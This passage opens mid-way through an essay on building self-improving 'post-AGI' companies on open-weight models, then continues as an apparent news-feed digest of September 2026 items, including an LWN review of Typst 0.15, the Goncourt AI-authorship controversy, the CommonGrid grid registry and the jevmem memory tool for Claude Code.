There is also a structural reason why this may persist. The frontier labs benefit from remaining horizontal providers of intelligence across many industries. Moving deeply into the operating layer of individual verticals would increasingly place them in competition with the very companies that depend on their models. Model development itself does not create the same conflict, which may help explain why recursive improvement has so far been concentrated most heavily at the model layer rather than in autonomous organizations built on top of it.

The same is true across much of the broader economy. Many organizations already possess enormous amounts of historical workflow data, institutional knowledge, and continuously generated performance data that could provide the foundations for increasingly autonomous systems. Yet most have so far approached AI primarily as an efficiency tool rather than as an opportunity to redesign the organization itself.

This creates an opening for new companies that can be built around post-AGI architectures from the ground up. They do not need to retrofit autonomous systems onto decades of inherited workflows, organizational structures, and incentives, and can instead design the company around artificial intelligence from the outset.

This window of opportunity will not stay open for long, as these architectures prove their value and established organizations begin adopting them more aggressively. Until then, however, the gap between what the technology can enable and how organizations are actually using it represents a significant moment of arbitrage.

The first-mover advantage lies not only in building the architecture earlier, but in the data, experience, and iterations that accumulate as the system continuously improves itself. The organizations that begin this process first may therefore be able to outpace later adopters even after the underlying approach to creating post-AGI companies becomes widely understood.

The Model Layer

The most capable AGI-level models today remain closed, with OpenAI and Anthropic currently operating at the frontier with even more capable models available to them internally. Open-weight models still lag the closed frontier models on the most demanding cross-domain tasks on par with Astra and Fable, but if current trend lines hold, I expect open models competitive with the closed frontier to begin emerging within the coming months.

More capable open models will allow post-AGI organizations to extend RSI deeper into their own intelligence stack, with far greater control over how their systems are deployed, specialized, and improved.

For one, reliance on research labs and closed-source models creates a significant concentration risk. As these models become embedded across every layer of the organization, the labs that control them gain an outsized degree of influence over how the company operates, leaving us increasingly dependent on decisions, access, and capabilities that remain outside our control.

This poses a significant challenge for any organization operating in critical or high-risk environments, from cybersecurity and finance to defense. In these domains, organizations cannot afford to depend on model developers’ shifting judgments about what uses are permissible, safe, or aligned with their values in order to retain access to the most capable models. Critical capabilities cannot ultimately rest on policies, restrictions, or strategic decisions made by an external organization.

Second, reliance on closed-source models creates a fundamental information asymmetry. You are exposing some of your organization’s most valuable workflows, research, and intellectual property to systems controlled by another company, one that is simultaneously expanding the capabilities of the infrastructure on which your own product depends.

This does not require malice. Model companies inevitably learn from how their products are used, where their systems fail, which capabilities users demand, and which workflows become economically valuable. Over time, the infrastructure on which your product depends can itself move upward into the application layer and begin competing with what you have built on top of it.

There is also a deeper epistemic problem of provenance in frontier models. Neither users nor, in many cases, the labs themselves can fully trace where every capability, insight, or piece of knowledge originated. The Navier-Stokes controversy illustrates how difficult it can become to determine whether a model arrived at an insight independently or whether its reasoning was influenced by material it had previously encountered. For organizations working in strategically sensitive domains, that uncertainty alone is significant.

Third, and perhaps most importantly, closed models limit how deeply an organization can extend its own recursively self-improving loop. If an organization wants to continuously improve based on its own performance and data, it needs to be able to push those learnings back down through the entire AI stack.

With closed models, that feedback loop can improve the application, tools, context, memory, orchestration, and harness surrounding the model, but the organization does not have full control over the underlying intelligence itself. The most valuable performance data it generates therefore cannot be freely converted into changes at every layer of the system.

True self-improvement therefore requires control of the model layer itself, including the ability to post-train, specialize, and continuously reshape the intelligence based on what the organization learns rather than treating the model as a fixed endpoint.

Just as two people or organizations can begin with similar capabilities and diverge through experience, two agents can begin from the exact same AGI-level base model and become increasingly different systems. Agent A can be optimized through its own performance and data for one domain, while Agent B can be optimized for another. Both remain generally intelligent, but each can continuously deepen its capabilities through what it learns from performing its particular task.

Intelligence Has No Final Peak

It is important here to dispel one of the false assumptions often associated with AGI, or even artificial superintelligence (ASI): that sufficiently intelligent systems will, by definition, be near-perfect at any task from the outset.

That assumption implicitly treats intelligence as having a final peak. History, however, suggests otherwise. At the end of the nineteenth century, some physicists believed the fundamental structure of physics was largely understood, only for relativity and quantum mechanics to reveal entirely new layers of reality and, with them, entirely new classes of questions.

The pursuit of knowledge is not a finite search. Every advance exposes greater depth, and what can be discovered is constrained as much by the creativity of the search as by the intelligence conducting it.

The same should hold for superintelligent systems. A model may perform extraordinarily well across domains and still have enormous room to improve within a particular domain through its own experience, performance, and data. AGI-level intelligence will therefore not be the end of the pursuit. It will be the foundation from which increasingly specialized and capable systems can continue to ascend.

That is why post-AGI companies, if they are to truly fulfill the promise of AI, must be built around continuous improvement across every layer of the stack, from the application and harness, through the code that runs the organization, and ultimately into the post-training of the models on which the business itself operates.

Intelligence in Every Direction

As I wrote in RSI and the Beginning of History , the architectures used to build post-AGI systems can extend across every domain and in every direction, wherever performance can be meaningfully evaluated and fed back into the system. The same self-improving architecture used by an AI model company to continuously build, assess, and improve the capabilities of its models can be applied to an AGI system for asset management, or equally to the development and optimization of physical AI in robotics.

The underlying principle is the same: observe performance, learn from it, improve the system, and repeat. What changes is simply the direction in which that intelligence is being pushed.

Building such companies therefore requires a new framework for thinking about organizations themselves. Rather than treating existing departments, roles, and hierarchies as fixed structures to which AI must be added, the organization can be decomposed into the underlying tasks, decisions, and objectives that constitute its work.

Each of these can then become a component of a larger intelligent system: performed by agents, evaluated by other agents or external outcomes, and continuously improved through the feedback generated by their performance. The organization itself becomes something that can be optimized.

The post-AGI era, therefore, may be enabled by models crossing a certain threshold of intelligence, but it will be defined by organizations built around architectures that allow such intelligence to act autonomously, learn from its own performance, and continuously improve through RSI.

Perhaps the most important consequence of this framework is that operating the organization and improving the organization increasingly become the same process. Every task performed produces new experience and performance data; every outcome provides another signal from which the system can learn. That learning can then flow back through the organization, improving its agents, harnesses, code, and ultimately the models themselves.

A post-AGI company therefore does not simply perform work autonomously. The act of performing that work continuously generates the knowledge required to perform it better. The more the organization operates, the more material it creates for its own improvement.

The Economic Impact

The economic impact of the post-AGI era could be unprecedented in the history of economics and humanity, and will only be accelerated as the same architectures are extended beyond software into physical AI and robotics.

The implications of this will need to be studied far more deeply, and we should be careful about comparing this transition too readily with previous technological revolutions. AI is frequently compared to the railroad, electricity, or the internet. But none of these technologies possessed the intelligence to participate directly in their own improvement. Post-AGI systems introduce something fundamentally different: intelligence that can continuously push itself toward the frontier, improve its own performance, and increasingly do so at a pace no human-driven organization could match.

Undoubtedly, a transition of this magnitude could be enormously disruptive. But there is another possibility worth considering: that the extraordinary speed of progress itself compresses the period of disruption. Previous technological upheavals often unfolded over years or decades, leaving economies and institutions caught for long periods between an old equilibrium and a new one. RSI may dramatically shorten that interval. The transition could therefore be severe in magnitude while surprisingly brief in duration, as the same systems responsible for the disruption simultaneously accelerate the creation of whatever comes next.

At first glance, it is easy to derive from this some of the more pessimistic visions of the future: a world in which those who accumulated capital before the arrival of AGI form a permanent economic upper class, while everyone else is progressively displaced from productive work. To me, however, this is too static a way of thinking about the post-AGI economy, because it assumes that the economic structures of the pre-AGI world will remain intact even as the technology fundamentally transforms the conditions on which those structures were built.

I believe a more plausible long-term direction is one of extraordinary abundance. This outcome is by no means guaranteed, but increasingly autonomous systems optimizing the production of energy, goods, infrastructure, software, food, medicine, transportation, and eventually much of the physical economy should dramatically expand our capacity to produce what humans need and desire. Greater productive abundance would not by itself determine how that abundance is distributed, and the institutions governing access would remain consequential.

The defining economic problem may therefore gradually shift away from scarcity in many domains toward managing abundance. If intelligence and increasingly physical labor can both be produced and scaled at dramatically lower marginal cost, the resulting expansion in productive capacity could exert powerful disinflationary, and in some sectors potentially deflationary, pressure across the economy.

Intelligence as a Factor of Production

That is why intelligence itself will increasingly become one of the fundamental inputs into production. What makes it unusual is that its economic significance can compound in two directions at once. We will be able to deploy increasing quantities of intelligence across an economy, while the intelligence being deployed will itself continue becoming more capable.

Each generation of systems can therefore expand both the amount of work that can be performed autonomously and the range and complexity of problems that can be addressed at all. Unlike a static input that merely becomes cheaper or more abundant, intelligence can simultaneously become more available and more powerful, allowing it to push outward into entirely new areas of production, research, and discovery.

Scarcity Moves

As intelligence becomes abundant, other constraints become increasingly important. Compute, energy, physical infrastructure, land, raw materials, and the speed at which new capacity can be constructed may become some of the principal bottlenecks of the post-AGI economy.

But even here the dynamic is unusual, because the intelligence demanding those resources can simultaneously be applied to expanding them. AI can improve energy grids, optimize load balancing and intermittency, design more efficient hardware and infrastructure, accelerate scientific research, and potentially help unlock entirely new sources of energy.

This creates another recursive loop: more energy enables more compute; more compute enables more intelligence; and more intelligence can be directed toward creating more efficient and abundant sources of energy and infrastructure.

How effectively we build the physical foundations necessary to sustain that loop may ultimately determine how quickly the post-AGI economy can emerge.

The post-AGI future should therefore not be imagined simply as today’s economy with far fewer human workers. It may represent a far deeper transformation in the relationship between intelligence, labor, capital, production, and scarcity itself.

Paving the Way

The emergence of the post-AGI economy will depend not only on what intelligence is capable of, but on whether we build the physical and institutional infrastructure necessary to allow it to scale.

The mechanical challenges are already immense. A world in which intelligence is continuously operating, experimenting, learning, and improving will require vastly more compute, energy, data centers, networks, and physical infrastructure than the AI economy of today. But many of the constraints on building that infrastructure are not technological, but human, ranging from permitting and regulation to institutions designed for a world moving at a fundamentally slower pace.

I believe these systems will need to evolve much faster if we want to fully realize the benefits of the post-AGI era. Intelligence may be able to compound at extraordinary speed, but it will remain constrained by the speed at which we allow its physical foundations to be built.

There is reason for optimism here as well. The same intelligence consuming these resources can increasingly be directed toward expanding them by designing more efficient computing systems, improving grids, balancing intermittent energy sources, accelerating the development of new forms of energy, and finding better ways of building the infrastructure on which it depends. If we enable that process, the loop between energy, compute, and intelligence can itself become increasingly self-reinforcing.

Open intelligence will be equally important. For organizations to build the recursively self-improving systems described throughout this essay, they need access not merely to intelligence, but to models they can inspect, deploy, specialize, post-train, and ultimately control.

From the perspective of Western technological resilience and leadership, this is particularly important. Many of the strongest openly available frontier models today are being developed by Chinese laboratories. Moonshot’s Kimi K3, for example, is explicitly released as an open-weight frontier model designed to compete across reasoning, coding, and knowledge work. Western research organizations should not leave the open frontier uncontested.

NVIDIA deserves particular recognition here. Its Nemotron program now publishes model weights, training data, recipes, and evaluation tooling, and NVIDIA has created a coalition specifically aimed at advancing open frontier models. I believe considerably more effort of this kind will be required if open intelligence is to remain a serious foundation on which the post-AGI ecosystem can be built.

Our Role

To me and to our team at Infinite Ascent, this future of expanding abundance driven by an explosion in intelligence is something we deeply believe in, and something toward which we have chosen to direct our resources.

We see the role of engineers and researchers in this era as increasingly becoming one of building post-AGI organizations themselves, developing systems in which autonomous intelligence moves progressively higher through the hierarchy of the organization, taking responsibility for more of its work, evaluating its own performance, and improving the systems beneath it.

In a sense, the ambition of highly technical teams building these organizations should be to make their own current roles progressively unnecessary. Not because human beings become irrelevant, but because every problem we succeed in solving should allow us to move toward the next one. There will always be new questions, new frontiers, and new problems worthy of those willing to pursue them.

We approach that future with humility. Some of the ideas expressed here may take considerably longer to materialize than we expect, and transformations of this magnitude will inevitably affect people’s lives in ways that cannot be predicted perfectly in advance.

But our underlying belief is one of profound optimism: that greater intelligence can ultimately produce a world of greater abundance, greater knowledge, and greater possibility, while allowing us to build in a way that benefits both intelligent life and the natural world around us.

That is the frontier we intend to advance.

RHONY Is Back and Goddammit, It's Good

hellgate
hellgatenyc.com
2026-09-25 12:59:59
A crucial gut-renovation of the cast has resuscitated the Big Apple's "Real Housewives" franchise....
Original Article

It never feels good to admit when you've made a mistake, but I need to come clean. I never thought I'd be crawling back to my laptop like this, my fingers slamming into the keys, committing these words to the written record. Yet here I am, hat in hand, heart in throat, delivering a mea culpa to you, Hell Gate readers: I was premature, overeager, in declaring the demise of the "The Real Housewives of New York City."

More than that, I was wrong. I was so fucking wrong. And now, they're back for a sixteenth season, after a season 14 shakeup that started our journey together back in 2023 .

Deep breath in. Deep breath out. We can do this together—because, I THINK, Bravo might have finally gotten their shit together and assembled a cast of women who could make funny and interesting television together. (Major caveat: I've been fooled before .)

Give us your email to read the full story

Sign up now for our free newsletters.

Sign up

Show HN: Doom or Bloom, map your AI worldview with Jev

Hacker News
www.doom-or-bloom.com
2026-09-25 12:51:28
Comments...
Original Article

Where do you land?

Explore your own AI worldview by answering a few simple questions.

Map your own worldview

Pope Leo warns AI could lead to losing 'humanity amid a paradise of machines' in Paris – video

Guardian
www.theguardian.com
2026-09-25 12:49:55
Pontiff continues to decry the rise of AI on his visit to France, stressing the importance of retaining 'ethical discernment' in an age when rapidly advancing technology threatens to undermine humanityEurope livePope Leo warns of AI threat to humanity at start of three-day France visit Continue read...
Original Article

Pontiff continues to decry the rise of AI on his visit to France, stressing the importance of retaining 'ethical discernment' in an age when rapidly advancing technology threatens to undermine humanity

A Skill.md for Commenting on Hacker News

Hacker News
blog.coredump.cx
2026-09-25 12:45:10
Comments...
Original Article

Roll a D6.

  1. Read the article.

  2. Find and quote the weakest sentence. Must be tangential to the main thesis.

  3. Say “This makes me not want to read the article.”

  1. Do not read the article.

  2. SF Bay Area humble brag: “This reminds me of the time I met Steve Jobs...”

  1. Open with “I have a doctorate in point-set topology. This is utter nonsense.”

  2. Fail to explain the concept correctly.

  1. “You no longer need to pay for software. I just spin up an agent swarm.”

  2. Your token budget is $7,000 a day.

“I agree that the emergence of the techno-surveillance state is appalling. But as the lead of facial recognition at Flock, I just don’t know what a single person can do.”

“I browse with HTML disabled. This site did not load for me.”

Discussion about this post

Ready for more?

Muse Looks Cute, but Looks Are Deceiving

Daring Fireball
www.inc.com
2026-09-25 12:38:39
Jason Aten, in a good follow-up to his previous column at Inc. (the one where he described how Muse, running on his Mac, read his Messages database) The entire reason Muse is interesting is that it isn’t just a chatbot, but can actually do things for you. But that promise also comes with a prett...
Original Article

Please enable JS and disable any ad blocker

Typst makes big strides

Hacker News
lwn.net
2026-09-25 12:25:08
Comments...
Original Article
Benefits for LWN subscribers

The primary benefit from subscribing to LWN is helping to keep us publishing, but, beyond that, subscribers get immediate access to all site content and access to a number of extra site features. Please sign up today!

Typst is a system for typesetting documents into various formats: PDF, SVG, PNG, and, in progress, HTML. It is adept at handling technical material, and is often considered to be an eventual LaTeX replacement. We last looked in on Typst a year ago, when it had reached version 0.13. A new version, 0.15, was released in June with lots of new features , including support for variable fonts, MathML, multiple bibliographies, and more. Typst is free, Apache-2.0-licensed software, programmed in Rust.

Variable Fonts

Typst now has support for variable fonts . Most fonts are distributed in a set of files containing their glyphs in different weights, in variations such as italic, bold, and so on. A recent development in the world of typography is the advent of variable fonts, which can contain all their variations in a single file. This both saves space and can permit greater flexibility on the part of the author or designer.

Font features and variations are chosen by setting the value for an "axis"; each axis changes some aspect of the rendered glyphs. There are typically multiple axes that can have discrete values, for turning on and off various features, or continuous values lying between two limits. The latter can be used, for example, for choosing the weight of the font along a continuum.

To test the new Typst feature, I downloaded two open-source variable fonts: Roboto Flex , a general-purpose font with 13 axes, and Zycon , a font containing no letters but 17 small decorative pictures. Zycon's six continuous axes smoothly alter various aspects of the pictures, making the font useful in animations.

Here is a Typst document that uses both of these fonts, varying one of the axes for each of them:

   #set text(font:"Roboto Flex")
   #for n in (-305, -200, -98) {
       set text(variations:("YTDE": n)) 
       [A penguin jumped quietly.
   
       ]
   }
   
   #set text(font:"Zycon")
   #for n in array.range(0, 10, inclusive:true) {
     set text(variations:("M1  ": n/10))
     str.from-unicode(127773)
   } 

In Typst, a " # " character puts the document in "code mode", where the rest of the line or block is interpreted as code in Typst's built-in language. Within code mode, material enclosed in square brackets is interpreted as "text mode", or text to be typeset.

The code above contains two commands to set the fonts by name, using one of the options of the text() function. Next we have for loops, which operate as might be expected. Inside the loops we call the text() function to set the variations variable. The text to be used with the Roboto Flex font is entered directly, but the output using the Zycon font is a single character specified with the str.from-unicode() function. It could have been entered directly, but readers may not have been able to see it, depending on the coverage in their browser's font.

The axis that we manipulate in Roboto Flex is called YTDE . As the figure below shows, this axis determines the length of the font's descenders , while leaving its other characteristics unchanged. This might be useful when typesetting tables, for example, to avoid collisions between the descenders and the table-cell boundaries. One of Zycon's six axes, called " M1 " (the two trailing spaces are part of the name; all axis names contain four characters), does different things to different characters. The effect on the Moon glyph is to change the lunar phase.

Compiling this document with typst compile vfont.typ produces a PDF in vfont.pdf , which is shown in the screen shot below:

[Variable fonts]

MathML

HTML export is still an experimental feature of Typst, but this release shows significant progress. The main new HTML feature is the translation of mathematics into MathML . The previous article on Typst showed the markup for a certain definite integral and displayed its output when rendered into a PDF by Typst. The same Typst code, when rendered into HTML, produces a long string of MathML markup that almost all reasonably current web browsers know how to interpret. The result appears like this:

∫ 0 1 ( arcsin 𝑥 ) 2 d 𝑥 𝑥 2 1 − 𝑥 2 = 𝜋 ln 2

If you don't see an equation above, your browser does not support MathML. If you do see it, a comparison with the typeset equation from the previous article shows that the PDF and HTML results are essentially identical. The ability to use Typst to produce TeX-quality mathematics in web browsers, without requiring a JavaScript library such as MathJax or having to resort to images, is a boon for scientific communication.

To enable the experimental HTML output, Typst requires a special flag:

   typst c --features html integral.typ integral.html  

That is the command used to typeset the equation markup in a file called integral.typ into HTML.

"Bundle" output

The typical use case for software such as Typst is the creation of single files, usually papers or books in the form of PDFs. The new "bundle" feature allows the author to specify a collection of output files, in any of the formats that Typst supports, in a single source file. These files can share data and contain both intra-document and inter-document links.

The feature is ideal for the creation of web sites, which consist of an interlinked network of HTML files. It should also be of interest to academics who might want to generate a slide deck for a conference talk along with the associated preprint from a single source file.

Here is a simple example of a Typst file that creates three interlinked documents, two HTML pages and a PDF, sharing a fragment of text:

   #let text = ['Twas brillig, and the slithy toves
         Did gyre and gimble in the wabe:]
   
   #document("poems.html", title: [Famous Poems])[
     #link(<jabberwocky>)[Here] is a famous nonsense poem.
   ]<home>
   
   #document("jabberwocky.html", title: [Jabberwocky by Lewis Carroll])[
   This famous poem begins like this:
   
   #text
   
   The #link(<jabberwockyPDF>)[rest] of the poem.
   
   Go #link(<home>)[home].
   ]<jabberwocky>
   
   #document("jabberwocky.pdf", title: [Jabberwocky: the Complete Poem])[
   #text ....
   
   Go #link(<home>)[home].
   ]<jabberwockyPDF>   

The command for processing this code, if it is saved in a file called bundle.typ , is:

   typst c --features html,bundle --format bundle bundle.typ   

In my tests, the bundle feature worked as advertised, but since it, along with HTML output, is still considered a work in progress, the compiler requires the --features flag.

The command above creates a new directory called "bundle" containing the three files defined in the #document() functions. They all contain the two initial lines of the poem saved in the text variable. There are hyperlinks between the HTML pages, from one of those to the PDF, and from the latter back to the two-page website. The links are targeted using the labels, contained within angle brackets, following each document function.

Multiple bibliographies

Typst now permits multiple bibliographies in a single document, which was an eagerly awaited feature. Its canonical application is for books that may need a separate reference section for each chapter. The feature is best introduced with a toy example:

   #show bibliography: set text(size: 8pt)
   
   = Chapter I
   
   According to @smith, Smith is uncommonly smart.
   
   #bibliography("works.bib",
   title: "References for Chapter I",
   group: none)
   
   = Chapter II
   
   Jones@jones has a different view. The issue was
   finally put to rest in the following year
   in @mergutroid.
   
   #bibliography("works.bib",
   title: "References for Chapter II",
   group: none)   

Here the first line specifies that the bibliographies should use a font size smaller than the default used in the main text. In that text, the " @ " prefixes create a citation using the default number-in-brackets style. At the end of each chapter, the bibliography() function is called. Its first argument specifies which database should be used for the bibliographic information; each bibliography section can use a different database, or collection of databases, if desired (see our recent article on Pandoc for a description of these text-file databases). The group argument controls how the citations are numbered. The value of none causes the numbering to begin with one for each section; numbering can alternatively be continuous for the entire work, or be grouped arbitrarily.

The figure below shows the output of the listing as it appears in PDF form:

[Bibliographies]

Multiple PDF standards

Avoiding the use of proprietary extensions is normally sufficient to ensure that the PDFs created with Typst, LaTeX, or any other competent software will fulfill the promise of the format: documents will be openable and appear identical in all readers, now and in the future. At a deeper level, however, a PDF is not just a PDF. There are various PDF versions and, on top of these, dozens of formal standards relating to archivability and accessibility. The standards for archivability are meant to ensure that the document really does work across a wide variety of reader software and that it will do so forever. The accessibility standards relate to the usability of a PDF for people with disabilities of various sorts.

Typst already had the ability to target various PDF versions and standards for archiving or accessibility. The new feature is the option to target more than one when compiling a document. This is useful, because one may want to generate a PDF that has both archival and accessibility attributes. The implementation of the feature helps the author to navigate the forest of PDF standards by issuing warnings or errors in the cases of incompatible combinations or failure to follow best practices for the standards targeted.

As an example, here is a command that attempts to compile the "book" document from the previous section, requesting both PDF version 1.7 and the A-1b archive standard:

   typst c --pdf-standard 1.7,a-1b book.typ  

The Typst compiler responds with this error message:

   error: PDF 1.7 is not compatible with PDF/A-1b
   hint: PDF/A-1b requires version PDF 1.4   

PDF version 1.7 is compatible with A-2b, so this will work:

   typst c --pdf-standard 1.7,a-2b book.typ   

If, however, we add the UA-1 accessibility standard, as in this command:

   typst c --pdf-standard 1.7,a-2b,ua-1 book.typ    

We again get an error:

   error: PDF/UA-1 error: missing document title
    = hint: set the title with `set document(title: [...])`   

Normally the Typst compiler doesn't insist on anything beyond correct syntax, but if we specify a particular accessibility standard, the document must conform to that standard. UA-1 requires, among other things, a document title.

The foregoing is not merely arcana, although it may seem to be of little relevance to the typical author of a scientific paper or textbook. These details are important to archivists and publishers; in addition to helping disabled users, producing accessible PDFs is a legal requirement applying to state and federal governments in the US and many other countries. Typst's advanced handling of multiple PDF standards makes it a useful tool in these contexts.

Conclusion

Typst 0.15 has other enhancements that are not described in detail in this article. Some of these are support for spot colors , detailed diagnostics that explain any failure of convergence during the compilation process, and new map and filter functions in the built-in scripting language. The documentation, which is updated to cover the new version, is now available in a 26MB PDF .

Typst is developed on GitHub , where it has 460 contributors. The creators of the project have written a guide for new contributors where they describe what a PR should look like and warn that any code or description generated by an LLM will be rejected. They are also forthright about the fact that Typst is a company as well as an open-source project, and that decisions about the direction of the project, as well as the suitability of individual contributions, will take the needs of the company into account. This is a factor that prospective contributors and users should keep in mind.

Progress in the development of the system is impressive. The community of users is enthusiastic; their participation has expanded the Typst ecosystem to over 1500 packages .

However, network effects in the publishing world are preventing Typst from fulfilling the potential that we saw for it in our previous article. Although users have devised templates to match the style specifications of several journals, those that require source submissions (rather than just PDFs) still insist on LaTeX, Word, or some other format. Very few accept manuscripts marked up in Typst. This is not likely to change while Typst remains in a pre-1.0 status (which is probably still a ways off ) and is in danger of requiring significant, possibly breaking changes to documents.

Despite this, Typst is an immensely useful tool today. For example, I recently had to create an SVG logo and found that writing a textual description using Typst's built-in graphics commands was quicker and easier than reaching for a drawing program. It's impossible to say whether Typst's advantages will lead to it becoming a "LaTeX replacement", as many of its admirers describe it. But, if development continues at the current pace, it is a distinct possibility, although one that may take a decade or two to come to fruition.


Index entries for this article
GuestArticles Phillips, Lee


Novelist accused of using AI to write book removed from French prize list

Guardian
www.theguardian.com
2026-09-25 12:14:32
Thélyson Orélien had been in the running to win a top literary prize before the AI claim emerged on social media The organisers of France’s most prestigious literary prize said they had removed a critically acclaimed novel by a Canadian-Haitian writer from the longlist after an anonymous online acco...
Original Article

The organisers of France’s most prestigious literary prize said they had removed a critically acclaimed novel by a Canadian-Haitian writer from the longlist after an anonymous online account claimed the book was “almost entirely” written by AI.

The Académie Goncourt, a Paris-based literary organisation, said on Friday its decision to withdraw Thélyson Orélien’s novel C’était ça ou mourir (It Was That or Die) was “driven by the desire to preserve the integrity of the Goncourt prize and the academy itself, whose central role is to promote and honour literature written by women and men”.

The Haiti-born author’s book is a lyrical first-person account of how a history and geography teacher flees a home country mired in gang violence and embarks on a perilous journey across 12 countries before finding a haven in Canada.

Published in France by Grasset in August, it has sold about 35,000 copies and won the Prix du roman Fnac, with translation rights sold to more than 20 countries.

A copy of C’était ça ou mourir on a table.
The novel on display inside a bookstore in Paris. Photograph: Sarah Meyssonnier/Reuters

Allegations that the book was written using AI emerged on X on 21 September, the same day It Was That or Die won the Fnac prize for best novel.

An anonymous account called Balance ton Claude – a reference to Anthropic’s AI agent – said it had fed the novel into the AI detection software Pangram and found it to be “almost entirely” written by artificial intelligence.

Questions have been raised over Pangram’s accuracy, and French media outlets have found other AI detection programmes that identified It Was That or Die as very probably written by a human.

Orélien, 38, has denied the allegation, saying it was racially motivated. “I’ve always loved creating and writing,” he said. “I don’t see why I would use a machine.”

He told the newspaper Libération that he used traditional language and rhythms that were Haitian and Caribbean. “The imagery, repetition and rhythm are a living language, they are mine.”

Orélien sits in front of an audience.
Orélien at Les Correspondances literature festival in Manosque this week. Photograph: Joel Saget/AFP/Getty Images

The author of the anonymous X account was later identified on the pages of the centre-right newspaper Le Figaro as one of its own columnists, Samuel Fitoussi, the author of an essay against “wokeism” on film and TV.

On his own X account, Fitoussi said he had initiated his campaign because even though he was “techno-optimistic”, he feared that “AI will cause the disappearance of reading and writing”.

On Wednesday Philippe Claudel, the Académie Goncourt’s president, had urged caution over the allegations. But separate accusations of plagiarism against Orélien published in French media appeared to have caused a change of heart.

Libération alleged in an article that the author plagiarised an award-winning short story from the preface of the French journalist Louis Pauwels’ book The Morning of the Magicians, originally published in 1960.

skip past newsletter promotion

In its statement the academy referred to the “plagiarisms of which its author has been guilty over time and which have just been revealed, as well as the convergent result of several analyses by trustworthy researchers and journalists highlighting the fact that [the book] is in all likelihood very largely the product of artificial intelligence”.

“The aim is to send a clear message,” it added, “to affirm that we neither endorse nor condone in any way the creation of texts generated with the help of AI.”

In a statement shared with the Guardian, the novel’s original publisher, Le Éditions du Boréal, said: “Unfortunately, at this stage, we are unable to confirm or deny the allegations the author is facing.”

The Canada-based publisher said it was important not tojump to conclusions, adding: “Without credible, concrete evidence, it is not our place to decide whether this book has a right to exist.”

Boréal said it was “concerned” about the newer plagiarism allegations, but added it was important to remember there was a real person behind the book. “We unequivocally condemn the hateful messages and personal attacks of recent days, and we urge everyone to show restraint,” it said.

Orélien has said he will not comment further on the latest allegations. Speaking on Thursday at Les Correspondances literary festival in Manosque, southern France, he said: “There’s this desire not only to attack the book, but especially my voice … to silence me,” adding that he would therefore “take a step back and wait until things have calmed down”.

The Académie Goncourt will publish its shortlist on 6 October and announce the winner of the prize on 4 November.

CommonGrid: The open source registry of the US power grid

Lobsters
commongrid.info
2026-09-25 12:12:04
Comments...
Original Article

The open, connected registry of the U.S. power grid

Built and maintained by a community of users who know every corner of the grid, CommonGrid connects energy infrastructure data into a public, shareable model. Anyone can contribute what's missing and sharpen what's rough, and the data is free to use under an open license.

View source on GitHub

  • Utilities
  • Grid operators
  • Power plants
  • Transmission lines
  • EV stations

A living dataset, with every edit citable, attributed, and reversible.

CommonGrid is built like a wiki, with every change recorded with an author, a source, and a timestamp. Every record has a history, and no record is silently overwritten.

Public infrastructure deserves public data.

The grid is a shared good. The knowledge of how it’s structured should be, too — available to regulators, researchers, startups, utilities, and anyone building what comes next.

Why open?

Fragmentation is the tax.

EIA forms, FERC filings, HIFLD shapefiles, state dockets, GIS exports — every serious grid question begins with three weeks of data plumbing. CommonGrid pays that cost once, for everyone.

Who maintains it?

People who work with this data.

Utility engineers, researchers, analysts at ISOs, and developers at energy startups. Contributors and a small elected moderation team. Texture funds the infrastructure; the project governs itself.

What's the license?

ODbL 1.0 — free, forever.

Use it commercially. Build products on it. Redistribute it. The only obligation is attribution and sharing improvements back. Same license as OpenStreetMap.

How an edit becomes part of the record.

Low-friction for small fixes, structured for big changes. Anyone can propose; trusted contributors are auto-approved on non-critical fields; approved edits are recorded in the changelog.

01

Propose

Hit Suggest edit on an entity page. Cite a source. Describe what changed and why.

02

Review

Moderators check citations and weigh conflicts. Trusted contributors skip review for non-critical fields. Contested changes trigger a discussion thread on the entity.

03

Approve & publish

Approved edits update the database immediately, making them available on the site and through the API. Each change also appears in the changelog.

04

Attribute

Every record carries its full edit history and citation trail. Researchers can cite a specific revision; auditors can see exactly who touched what.

REST API, vector tiles, weekly snapshot.

60 requests/hour unauthenticated. 5,000/hour with a free key. Geo endpoints serve MVT tiles. Full database dumps published weekly under ODbL.

Jevmem – automatic project memory for Claude Code, built on Jev

Hacker News
github.com
2026-09-25 12:04:04
Comments...
Original Article

Automatic project memory for Claude Code. Also works with Cursor and Codex.

npm version license node CI M8ven Verified

What it does

jevmem-launch-readme-v2.mp4
  • Saves decisions, constraints, bugs and todos from your Claude Code chats into JEVMEM.md , automatically.
  • When you change your mind, the old line is marked superseded, not deleted.
  • Next session, the relevant lines are added to Claude's context.
- [decision] Use Postgres 16 for the primary store; SQLite locks under load  <!-- id:k3d9xq ts:2026-09-22T10:14:02.113Z conf:0.93 -->
- [constraint] Node 20 is the floor; CI runs 20 and 22  <!-- id:p1m4zt ts:2026-09-22T10:20:41.907Z conf:0.88 -->
- [superseded] Use SQLite as the primary store → id:k3d9xq  <!-- id:a8s2ww ts:2026-09-20T16:02:11.000Z conf:0.81 by:k3d9xq -->

Install (60 seconds)

npm install -g jevmem
export TYPESAFE_API_KEY=...        # https://typesafe.ai (an OpenAI or Anthropic key is optional)
cd your-project
jevmem init --tool claude

init creates JEVMEM.md , jevmem.config.json and a gitignored .jevmem/ folder, and registers two Claude Code hooks in .claude/settings.local.json , which it adds to .gitignore ( details ).

Works with

What is automatic and what depends on the agent:

Tool Setup Capture Recall
Claude Code jevmem init --tool claude Automatic , every turn, via the Stop hook Automatic , every prompt, via UserPromptSubmit
Codex jevmem init --tool codex Automatic while jevmem watch runs (it tails Codex's session log for this project and runs the same decide → write path); otherwise agent-initiated via MCP add_memory , prompted by an AGENTS.md section Agent-initiated: search_memory via MCP, prompted by AGENTS.md
Cursor jevmem init --tool cursor Agent-initiated: a .cursor/rules/jevmem.mdc rule tells the agent to call MCP add_memory when you state a decision. Nothing is captured if it doesn't Agent-initiated: the rule tells it to call search_memory before non-trivial tasks
Claude Desktop jevmem init --tool claude-desktop prints a config snippet to paste (one project per config, named with --root ) Manual: ask it to call add_memory (no hook, no rule file) On request: search_memory

MCP add_memory goes through the same gate as the hook. Client configs: docs/mcp.md .

How it decides

  1. Scrub. Common secret shapes, email addresses and card-shaped numbers are removed from the turn before it leaves your machine.
  2. Ask Jev typed questions. Jev by TypeSafe AI answers a fixed set of small questions with probabilities: is there a decision, a rule, a bug? is it small talk or an injection attempt? which existing line does it change?
  3. Apply thresholds in code. Plain rules over those probabilities decide save or skip; they live in jevmem.config.json , not in a prompt.
